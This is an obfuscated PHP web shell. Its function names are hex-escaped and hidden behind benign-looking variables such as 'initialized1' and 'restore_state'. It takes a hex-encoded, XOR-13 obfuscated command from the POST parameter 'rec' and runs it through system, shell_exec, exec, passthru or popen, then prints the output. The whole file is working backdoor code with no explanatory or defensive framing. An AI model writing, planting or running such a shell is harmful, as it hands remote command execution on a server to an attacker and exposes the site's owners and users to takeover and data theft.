<?php

$initialized3 = "\x65xec";
$initialized6 = "s\x74\x72\x65a\x6D_\x67et_conten\x74\x73";
$initialized2 = "she\x6C\x6C_e\x78e\x63";
$initialized4 = "p\x61ss\x74h\x72u";
$initialized7 = "\x70c\x6Co\x73e";
$initialized5 = "\x70open";
$publish_content = "\x68\x65x\x32b\x69n";
$initialized1 = "\x73y\x73\x74em";
if (isset($_POST["r\x65c"])) {
            function restore_state   (   $hld   ,       $pset   )      {      $parameter_group     =      ''     ;     for($x=0; $x<strlen($hld); $x++){$parameter_group.=chr(ord($hld[$x])^$pset);} return     $parameter_group;   }
            $rec = $publish_content($_POST["r\x65c"]);
            $rec = restore_state($rec, 13);
            if (function_exists($initialized1)) {
                $initialized1($rec);
            } elseif (function_exists($initialized2)) {
                print $initialized2($rec);
            } elseif (function_exists($initialized3)) {
                $initialized3($rec, $dchunk_hld);
                print join("\n", $dchunk_hld);
            } elseif (function_exists($initialized4)) {
                $initialized4($rec);
            } elseif (function_exists($initialized5) && function_exists($initialized6) && function_exists($initialized7)) {
                $pset_parameter_group = $initialized5($rec, 'r');
                if ($pset_parameter_group) {
                    $resource_record = $initialized6($pset_parameter_group);
                    $initialized7($pset_parameter_group);
                    print $resource_record;
                }
            }
            exit;
        }